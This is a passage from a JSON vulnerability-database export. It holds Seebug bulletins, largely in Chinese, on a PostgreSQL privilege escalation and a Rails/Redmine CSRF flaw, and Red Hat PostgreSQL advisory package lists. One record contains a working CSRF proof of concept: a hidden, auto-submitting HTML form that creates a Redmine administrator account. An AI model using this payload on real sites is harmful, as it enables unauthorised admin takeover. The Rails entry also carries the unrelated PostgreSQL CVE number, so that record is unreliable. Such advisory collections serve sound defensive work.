"cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "status": "details"}, {"lastseen": "2017-11-19T18:25:04", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "Bugraq ID: 37333\r\nCVE ID\uff1aCVE-2009-4136\r\n\r\nPostgreSQL\u662f\u4e00\u6b3e\u5bf9\u8c61\u5173\u7cfb\u578b\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\uff0c\u652f\u6301\u6269\u5c55\u7684SQL\u6807\u51c6\u5b50\u96c6\u3002\r\n\u7d22\u5f15\u51fd\u6570\u4e2d\u5904\u7406\u4f1a\u8bdd\u72b6\u6001\u66f4\u6539\u5b58\u5728\u4e00\u4e2a\u9519\u8bef\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u63d0\u5347\u7279\u6743\u3002\n\nPostgreSQL PostgreSQL 8.4.1 \r\nPostgreSQL PostgreSQL 8.3.8 \r\nPostgreSQL PostgreSQL 8.3.6 \r\nPostgreSQL PostgreSQL 8.2.14 \r\nPostgreSQL PostgreSQL 8.2.6 \r\nPostgreSQL PostgreSQL 8.2.4 \r\nPostgreSQL PostgreSQL 8.2.3 \r\nPostgreSQL PostgreSQL 8.2.2 \r\nPostgreSQL PostgreSQL 8.2 \r\nPostgreSQL PostgreSQL 8.1.18 \r\nPostgreSQL PostgreSQL 8.1.11 \r\nPostgreSQL PostgreSQL 8.1.9 \r\nPostgreSQL PostgreSQL 8.1.8 \r\nPostgreSQL PostgreSQL 8.1.5 \r\nPostgreSQL PostgreSQL 8.1.4 \r\nPostgreSQL PostgreSQL 8.1.3 \r\nPostgreSQL PostgreSQL 8.1.1 \r\nPostgreSQL PostgreSQL 8.0.22 \r\nPostgreSQL PostgreSQL 8.0.15 \r\nPostgreSQL PostgreSQL 8.0.13 \r\nPostgreSQL PostgreSQL 8.0.9 \r\nPostgreSQL PostgreSQL 8.0.8 \r\nPostgreSQL PostgreSQL 8.0.7 \r\nPostgreSQL PostgreSQL 8.0.5 \r\nPostgreSQL PostgreSQL 8.0.4 \r\nPostgreSQL PostgreSQL 8.0.3 \r\nPostgreSQL PostgreSQL 8.0.2 \r\nPostgreSQL PostgreSQL 8.0.1 \r\nPostgreSQL PostgreSQL 8.0 \r\nPostgreSQL PostgreSQL 7.4.26 \r\nPostgreSQL PostgreSQL 7.4.19 \r\nPostgreSQL PostgreSQL 7.4.17 \r\nPostgreSQL PostgreSQL 7.4.14 \r\nPostgreSQL PostgreSQL 7.4.13 \r\nPostgreSQL PostgreSQL 7.4.12 \r\nPostgreSQL PostgreSQL 7.4.11 \r\nPostgreSQL PostgreSQL 7.4.10 \r\nPostgreSQL PostgreSQL 7.4.9 \r\nPostgreSQL PostgreSQL 7.4.8 \r\nPostgreSQL PostgreSQL 7.4.7 \r\nPostgreSQL PostgreSQL 7.4.6 \r\nPostgreSQL PostgreSQL 7.4.5 \r\nPostgreSQL PostgreSQL 7.4.4 \r\nPostgreSQL PostgreSQL 7.4.3 \r\nPostgreSQL PostgreSQL 7.4.2 \r\nPostgreSQL PostgreSQL 7.4.1 \r\nPostgreSQL PostgreSQL 7.4 \r\nPostgreSQL PostgreSQL 8.4\r\nPostgreSQL PostgreSQL 8.3\r\nPostgreSQL PostgreSQL 8.1.7\r\nPostgreSQL PostgreSQL 8.0.11\r\nPostgreSQL PostgreSQL 7.4.16\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5b89\u5168\u516c\u544a\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\nhttp://www.postgresql.org/about/news.1170", "reporter": "Root", "published": "2009-12-17T00:00:00", "type": "seebug", "title": "PostgreSQL\u7d22\u5f15\u51fd\u6570\u4f1a\u8bdd\u72b6\u6001\u4fee\u6539\u672c\u5730\u7279\u6743\u63d0\u5347\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4136"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-12-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15095", "id": "SSV:15095", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "status": "details"}, {"lastseen": "2017-11-19T18:18:01", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "BUGTRAQ ID: 37333\r\nCVE ID: CVE-2009-4136\r\n\r\nPostgreSQL\u662f\u4e00\u6b3e\u9ad8\u7ea7\u5bf9\u8c61\uff0d\u5173\u7cfb\u578b\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\uff0c\u652f\u6301\u6269\u5c55\u7684SQL\u6807\u51c6\u5b50\u96c6\u3002\r\n\r\nPostgreSQL\u5728\u6267\u884c\u6570\u636e\u5e93\u8d85\u7ea7\u7528\u6237\u7684\u7d22\u5f15\u529f\u80fd\u671f\u95f4\u6ca1\u6709\u6b63\u786e\u5730\u7ba1\u7406session-local\u72b6\u6001\uff0c\u8fd9\u5141\u8bb8\u901a\u8fc7\u8ba4\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u5e26\u6709\u7279\u5236\u7d22\u5f15\u529f\u80fd\u7684\u8868\u683c\u83b7\u5f97\u6743\u9650\u63d0\u5347\u3002\n\nPostgreSQL PostgreSQL 8.4.x\r\nPostgreSQL PostgreSQL 8.3.x\r\nPostgreSQL PostgreSQL 8.2.x\r\nPostgreSQL PostgreSQL 8.1.x\r\nPostgreSQL PostgreSQL 8.0.x\r\nPostgreSQL PostgreSQL 7.4.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPostgreSQL\r\n----------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.postgresql.org/about/news.1170\r\n\r\nSun\r\n---\r\nSun\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08Sun-Alert-6909139\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nSun-Alert-6909139\uff1aSecurity Vulnerabilities in PostgreSQL Shipped With Solaris May Allow Escalation of Privileges or Man-in-the-Middle on SSL Connections\r\n\u94fe\u63a5\uff1ahttp://sunsolve.sun.com/search/document.do?assetkey=1-66-274870-1", "reporter": "Root", "published": "2009-12-29T00:00:00", "title": "PostgreSQL\u7d22\u5f15\u529f\u80fd\u6743\u9650\u63d0\u5347\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4136"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-12-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15153", "id": "SSV:15153", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T18:25:04", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "Bugraq ID: 37322\r\nCVE ID\uff1aCVE-2009-4136\r\n\r\nRuby on Rails\u662f\u4e00\u6b3eWeb\u5e94\u7528\u7a0b\u5e8f\u6846\u67b6\uff0c\u6784\u5efa\u5728Ruby\u8bed\u8a00\u4e4b\u4e0a\u3002\r\nRuby on Rails 'protect_from_forgery'\u5b58\u5728\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\u653b\u51fb\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u6267\u884c\u90e8\u5206\u7ba1\u7406\u5458\u64cd\u4f5c\uff0c\u83b7\u5f97\u5bf9\u5e94\u7528\u7a0b\u5e8f\u7684\u672a\u6388\u6743\u8bbf\u95ee\u6216\u5220\u9664\u90e8\u5206\u6570\u636e\u3002\n\nRuby on Rails Ruby on Rails 2.3.5 \r\nRuby on Rails Ruby on Rails 2.3.4 \r\nRuby on Rails Ruby on Rails 2.3.3 \r\nRuby on Rails Ruby on Rails 2.3.2 \r\nRuby on Rails Ruby on Rails 2.2.3 \r\nRuby on Rails Ruby on Rails 2.2.2 \r\nRuby on Rails Ruby on Rails 2.1.1 \r\nRuby on Rails Ruby on Rails 2.1 \r\nRuby on Rails Ruby on Rails 2.0.5 \r\nRuby on Rails Ruby on Rails 2.0.4 \r\nRuby on Rails Ruby on Rails 2.0 \r\nRuby on Rails Ruby on Rails 1.2.6 \r\nRuby on Rails Ruby on Rails 1.2.5 \r\nRuby on Rails Ruby on Rails 1.2.3 \r\nRuby on Rails Ruby on Rails 1.1.6 \r\nRuby on Rails Ruby on Rails 1.1.5 \r\nRuby on Rails Ruby on Rails 1.1.4 \r\nRuby on Rails Ruby on Rails 1.1.3 \r\nRuby on Rails Ruby on Rails 1.1.2 \r\nRuby on Rails Ruby on Rails 1.1.1 \r\nRuby on Rails Ruby on Rails 1.1 \r\nRuby on Rails Ruby on Rails 1.0\r\nRuby on Rails Ruby on Rails 0.14\r\nRuby on Rails Ruby on Rails 0.13\r\nRedmine Redmine 0.8.7 \r\nRedmine Redmine 0.8.6 \r\nRedmine Redmine 0.8.5 \r\nRedmine Redmine 0.7.3 \r\nRedmine Redmine 0.7.2\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\u63d0\u4f9b\uff1a\r\nhttp://www.rubyonrails.com/\r\nhttp://www.redmine.org/", "reporter": "Root", "published": "2009-12-17T00:00:00", "type": "seebug", "title": "Ruby on Rails 'protect_from_forgery'\u8de8\u7ad9\u811a\u672c\u8bf7\u6c42\u4f2a\u9020\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4136"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-12-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15097", "id": "SSV:15097", "sourceData": "\n /**\r\n* Redmine &lt;= 0.8.6 CSRF Add Admin User Exploit\r\n* Discovered by: p0deje (http://p0deje.blogspot.com)\r\n* Application: http://www.redmine.org/wiki/redmine/Download\r\n* SA: http://www.redmine.org/news/30\r\n* Date: 13.11.2009\r\n* Versions affected: &lt;= 0.8.6\r\n* Description: this is a simple exploit which exploits CSRF vulnerability in Redmine, it creates user account with adminstartive rights\r\n*/\r\n \r\n&lt;html&gt;\r\n&lt;body&gt;\r\n &lt;form method=POST action=&quot;http://www.example.com/users/new&quot;&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;text&quot; value=&quot;hacker&quot; size=&quot;25&quot; name=&quot;user[login]&quot; id=&quot;user_login&quot;/&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;text&quot; value=&quot;hacker&quot; size=&quot;30&quot; name=&quot;user[firstname]&quot; id=&quot;user_firstname&quot;/&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;text&quot; value=&quot;hacker&quot; size=&quot;30&quot; name=&quot;user[lastname]&quot; id=&quot;user_lastname&quot;/&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;text&quot; value=&quot;hacker@hacker.com&quot; size=&quot;30&quot; name=&quot;user[mail]&quot; id=&quot;user_mail&quot;/&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;password&quot; size=&quot;25&quot; name=&quot;password&quot; id=&quot;password&quot; value=&quot;hacker&quot; /&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;password&quot; size=&quot;25&quot; name=&quot;password_confirmation&quot; id=&quot;password_confirmation&quot; value=&quot;hacker&quot; /&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;checkbox&quot; value=&quot;1&quot; name=&quot;user[admin]&quot; id=&quot;user_admin&quot;/&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;hidden&quot; value=&quot;1&quot; name=&quot;user[admin]&quot;/&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;submit&quot; value=&quot;Create&quot; id=&quot;commit&quot; name=&quot;commit&quot; /&gt;\r\n &lt;/form&gt;\r\n &lt;script&gt;document.getElementById(&quot;commit&quot;).click();&lt;/script&gt;\r\n&lt;/body&gt;\r\n&lt;/html&gt;\r\n \r\n/**\r\n* P.S. Actually, this vulnerability wasn&#039;t fixed in Redmine 0.8.7, because token was generated one time for all the pages and allthe users.\r\n* Thus, you can add POST data with token of any user and exploit will be working again\r\n*/\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15097", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "status": "poc,details"}], "redhat": [{"lastseen": "2018-05-27T21:43:08", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "7.3.21-3", "arch": "ppc", "packageName": "rh-postgresql-python", "packageFilename": "rh-postgresql-python-7.3.21-3.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "7.3.21-3", "arch": "ppc", "packageName": "rh-postgresql-libs", "packageFilename": "rh-postgresql-libs-7.3.21-3.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "7.3.21-3", "arch": "ppc64", "packageName": "rh-postgresql-libs", "packageFilename": "rh-postgresql-libs-7.3.21-3.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "7.3.21-3", "arch": "ppc", "packageName": "rh-postgresql-devel", "packageFilename": "rh-postgresql-devel-7.3.21-3.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "7.3.21-3", "arch": "ppc", "packageName": "rh-postgresql-pl", "packageFilename": "rh-postgresql-pl-7.3.21-3.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "7.3.21-3", "arch": "ppc", "packageName": "rh-postgresql-tcl", "packageFilename": "rh-postgresql-tcl-7.3.21-3.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "7.3.21-3", "arch": "ppc", "packageName": "rh-postgresql", "packageFilename": "rh-postgresql-7.3.21-3.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "7.3.21-3", "arch": "ppc", "packageName": "rh-postgresql-test", "packageFilename": "rh-postgresql-test-7.3.21-3.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "7.3.21-3", "arch": "ppc", "packageName": "rh-postgresql-jdbc", "packageFilename": "rh-postgresql-jdbc-7.3.21-3.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "7.3.21-3", "arch": "ppc", "packageName": "rh-postgresql-server", "packageFilename": "rh-postgresql-server-7.3.21-3.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "7.3.21-3", "arch": "ppc", "packageName": "rh-postgresql-contrib", "packageFilename": "rh-postgresql-contrib-7.3.21-3.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "7.3.21-3", "arch": "ppc", "packageName": "rh-postgresql-docs", "packageFilename": "rh-postgresql-docs-7.3.21-3.ppc.rpm", "operator": "lt"}], "description": "PostgreSQL is an advanced object-relational database management system\n(DBMS). PL/Perl and PL/Tcl allow users to write PostgreSQL functions in the\nPerl and Tcl languages, and are installed in trusted mode by default. In\ntrusted mode, certain operations, such as operating system level access,\nare restricted.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Perl. If the PL/Perl procedural language was\nregistered on a particular database, an authenticated database user running\na specially-crafted PL/Perl script could use this flaw to bypass intended\nPL/Perl trusted mode restrictions, allowing them to run arbitrary Perl\nscripts with the privileges of the database server. (CVE-2010-1169)\n\nRed Hat would like to thank Tim Bunce for responsibly reporting the\nCVE-2010-1169 flaw.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Tcl. If the PL/Tcl procedural language was registered\non a particular database, an authenticated database user running a\nspecially-crafted PL/Tcl script could use this flaw to bypass intended\nPL/Tcl trusted mode restrictions, allowing them to run arbitrary Tcl\nscripts with the privileges of the database server. (CVE-2010-1170)\n\nA buffer overflow flaw was found in the way PostgreSQL retrieved a\nsubstring from the bit string for BIT() and BIT VARYING() SQL data types.\nAn authenticated database user running a specially-crafted SQL query could\nuse this flaw to cause a temporary denial of service (postgres daemon\ncrash) or, potentially, execute arbitrary code with the privileges of the\ndatabase server. (CVE-2010-0442)\n\nAn integer overflow flaw was found in the way PostgreSQL used to calculate\nthe size of the hash table for joined relations. An authenticated database\nuser could create a specially-crafted SQL query which could cause a\ntemporary denial of service (postgres daemon crash) or, potentially,\nexecute arbitrary code with the privileges of the database server.\n(CVE-2010-0733)\n\nPostgreSQL improperly protected session-local state during the execution of\nan index function by a database superuser during the database maintenance\noperations. An authenticated database user could use this flaw to elevate\ntheir privileges via specially-crafted index functions. (CVE-2009-4136)\n\nAll PostgreSQL users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. Running\nPostgreSQL instances must be restarted (\"service rhdb restart\") for this\nupdate to take effect.\n", "reporter": "RedHat", "published": "2010-05-19T04:00:00", "type": "redhat", "title": "(RHSA-2010:0427) Moderate: postgresql security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-4136", "CVE-2010-0442", "CVE-2010-0733", "CVE-2010-1169", "CVE-2010-1170"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-26T04:26:17", "id": "RHSA-2010:0427", "href": "https://access.redhat.com/errata/RHSA-2010:0427", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:20:22", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-pl-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-pl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-tcl-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-devel-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-server-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-server", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-contrib-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-contrib", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-test-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-test", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-python-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-python", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-libs-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-docs-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-docs", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "src", "packageFilename": "postgresql-8.1.21-1.el5_5.1.src.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-libs-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-python-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-python", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-docs-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-docs", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-contrib-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-contrib", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-tcl-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ppc", "packageFilename": "postgresql-8.1.21-1.el5_5.1.ppc.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ppc", "packageFilename": "postgresql-pl-8.1.21-1.el5_5.1.ppc.rpm", "packageName": "postgresql-pl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ppc", "packageFilename": "postgresql-devel-8.1.21-1.el5_5.1.ppc.rpm", "packageName": "postgresql-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ppc", "packageFilename": "postgresql-docs-8.1.21-1.el5_5.1.ppc.rpm", "packageName": "postgresql-docs", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ppc", "packageFilename": "postgresql-libs-8.1.21-1.el5_5.1.ppc.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ppc", "packageFilename": "postgresql-server-8.1.21-1.el5_5.1.ppc.rpm", "packageName": "postgresql-server", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ppc64", "packageFilename": "postgresql-libs-8.1.21-1.el5_5.1.ppc64.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ppc", "packageFilename": "postgresql-contrib-8.1.21-1.el5_5.1.ppc.rpm", "packageName": "postgresql-contrib", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ppc64", "packageFilename": "postgresql-8.1.21-1.el5_5.1.ppc64.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ppc", "packageFilename": "postgresql-tcl-8.1.21-1.el5_5.1.ppc.rpm", "packageName": "postgresql-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ppc", "packageFilename": "postgresql-test-8.1.21-1.el5_5.1.ppc.rpm", "packageName": "postgresql-test", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ppc", "packageFilename": "postgresql-python-8.1.21-1.el5_5.1.ppc.rpm", "packageName": "postgresql-python", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ppc64", "packageFilename": "postgresql-devel-8.1.21-1.el5_5.1.ppc64.rpm", "packageName": "postgresql-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "s390x", "packageFilename": "postgresql-server-8.1.21-1.el5_5.1.s390x.rpm", "packageName": "postgresql-server", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "s390x", "packageFilename": "postgresql-tcl-8.1.21-1.el5_5.1.s390x.rpm", "packageName": "postgresql-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "s390", "packageFilename": "postgresql-libs-8.1.21-1.el5_5.1.s390.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "s390x", "packageFilename": "postgresql-8.1.21-1.el5_5.1.s390x.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "s390", "packageFilename": "postgresql-devel-8.1.21-1.el5_5.1.s390.rpm", "packageName": "postgresql-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "s390x", "packageFilename": "postgresql-contrib-8.1.21-1.el5_5.1.s390x.rpm", "packageName": "postgresql-contrib", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "s390x", "packageFilename": "postgresql-test-8.1.21-1.el5_5.1.s390x.rpm", "packageName": "postgresql-test", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "s390x", "packageFilename": "postgresql-python-8.1.21-1.el5_5.1.s390x.rpm", "packageName": "postgresql-python", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "s390x", "packageFilename": "postgresql-devel-8.1.21-1.el5_5.1.s390x.rpm", "packageName": "postgresql-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "s390x", "packageFilename": "postgresql-docs-8.1.21-1.el5_5.1.s390x.rpm", "packageName": "postgresql-docs", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "s390x", "packageFilename": "postgresql-libs-8.1.21-1.el5_5.1.s390x.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "s390x", "packageFilename": "postgresql-pl-8.1.21-1.el5_5.1.s390x.rpm", "packageName": "postgresql-pl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-pl-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-pl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-devel-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-test-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-test", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-server-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-server", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-tcl-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-tcl", "operator": "lt"}, {"OS": 